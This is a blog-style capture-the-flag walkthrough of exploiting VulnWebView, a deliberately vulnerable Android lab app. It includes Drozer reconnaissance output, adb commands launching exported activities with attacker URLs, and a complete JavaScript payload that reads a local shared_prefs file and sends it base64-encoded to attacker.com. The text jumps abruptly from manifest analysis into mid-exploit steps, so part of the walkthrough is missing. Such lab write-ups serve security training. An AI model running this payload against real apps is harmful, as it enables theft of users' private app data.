In this blog post, Iβll walk you through how I hacked the VulnWebView lab, an Android application designed to demonstrate common WebView vulnerabilities. By exploiting these vulnerabilities, I was able to achieve Cross-Site Scripting (XSS), token theft, and local file exfiltration. Letβs dive into the details!
1. Reconnaissance
Before diving into exploitation, I started by analyzing the app using the Drozer framework. This helped me understand the attack surface and identify potential vulnerabilities.
Drozer Commands
β― drozer console connect
dz> run app.package.list -f vulnwebview
Attempting to run shell module
com.tmh.vulnwebview (Vuln Web View)
dz> run app.package.info -a com.tmh.vulnwebview
Attempting to run shell module
Package: com.tmh.vulnwebview
Application Label: Vuln Web View
Process Name: com.tmh.vulnwebview
Version: 1.0
Data Directory: /data/user/0/com.tmh.vulnwebview
APK Path: /data/app/~~APm9rOCvrbng9-T3LMK5cg==/com.tmh.vulnwebview-rqHlBHSQpZJBVQmg8fONOA==/base.apk
UID: 10132
GID: [3003]
Shared Libraries: [/system/framework/android.test.base.jar]
Shared User ID: null
Uses Permissions:
- android.permission.INTERNET
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.ACCESS_MEDIA_LOCATION
Defines Permissions:
- None
dz> run app.package.attacksurface com.tmh.vulnwebview
Attempting to run shell module
Attack Surface:
3 activities exported
0 broadcast receivers exported
0 content providers exported
0 services exported
is debuggable
Findings
The app has 3 exported activities.
It is debuggable, which makes it easier to analyze.
It uses WebView components, which are often prone to vulnerabilities.
2. Analyzing the Android Manifest
Next, I decompiled the app using Jadx to inspect the AndroidManifest.xml file. This revealed the exported activities and their configurations.
Host the exploit script on a server (e.g., using Ngrok).
Launch the SupportWebView activity with the malicious URL:
adb shell am start -n com.tmh.vulnwebview/.SupportWebView --es support_url "https://attacker-server.com/exploit.html"
The token will be sent to the attacker's server.
Exploiting RegistrationWebView for Local File Exfiltration
The setAllowUniversalAccessFromFileURLs(true) setting allows JavaScript to read local files and exfiltrate them.
Exploit JavaScript Code:
<!DOCTYPE html>
<html>
<head>
<title>Exploit</title>
<script>
// Target local file to read (e.g., shared preferences file)
var url = 'file:///data/data/com.tmh.vulnwebview/shared_prefs/MainActivity.xml';
// Function to load and exfiltrate the file contents
function load(url) {
var xhr = new XMLHttpRequest(); // Create a new XMLHttpRequest object
// Define the onreadystatechange event handler
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) { // Check if the request is complete
// Encode the file contents in Base64
var base64Content = btoa(xhr.responseText);
// Send the encoded content to the attacker's server
fetch('https://attacker.com/?exfiltrated=' + base64Content)
.then(response => console.log('Data exfiltrated successfully'))
.catch(error => console.error('Exfiltration failed:', error));
}
};
// Open and send the GET request
xhr.open('GET', url, true);
xhr.send('');
}
// Trigger the exploit
load(url);
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>
Steps:
Save the exploit script as poc.html and push it to the device:
adb push poc.html /sdcard/poc.html
Launch the RegistrationWebView activity with the malicious file URL:
adb shell am start -n com.tmh.vulnwebview/.RegistrationWebView --es reg_url "file:///sdcard/poc.html"
The contents of MainActivity.xml will be exfiltrated to the attacker's server.
